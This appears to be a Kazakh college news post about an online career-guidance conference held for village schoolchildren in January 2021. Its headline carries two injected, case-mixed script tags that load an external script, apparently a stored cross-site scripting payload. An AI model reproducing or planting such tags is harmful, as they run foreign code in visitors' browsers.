Кәсіптік бағдар беру жұмыстары жүргізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.01.2021
Кәсіптік бағдар беру жоспарына сәйкес 2021 жылдың 29 қаңтар күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде Информатика бөлімінің ұйымдастыруымен Ақмола облысы Целиноград ауданының білім беру бөлімінің "Софиевка ауылының №21 орта мектебі" КММ-нің 9-11 сынып оқушыларының мамандықты таңдау жасауына бағыт беру мақсатында ZOOM платформасы арқылы «Менің мамандығым – менің болашағым» атты онлайн конференция ұйымдастырылды. Жалпы қатысқан оқушылар саны – 42. Колледж туралы презентация көрсетіліп, мамандықтар және қосымша біліктіліктер таныстырылды. Кері байланыс орнатылып, оқушылар өздерін қызықтырған сұрақтарына жауап алды. Іс-шараға Информатика бөлімінің меңгерушісі А.Қалменбай қатысты. Кәсіби бағдар беру жұмыстарында белсенділік танытқан информатика бөлімінің 2019 жылдың түлегі Хайри Шоқанға алғыс білдіреміз.
Просмотров: 461


Пікір қосу



Деректерді қолтаңбаға қосу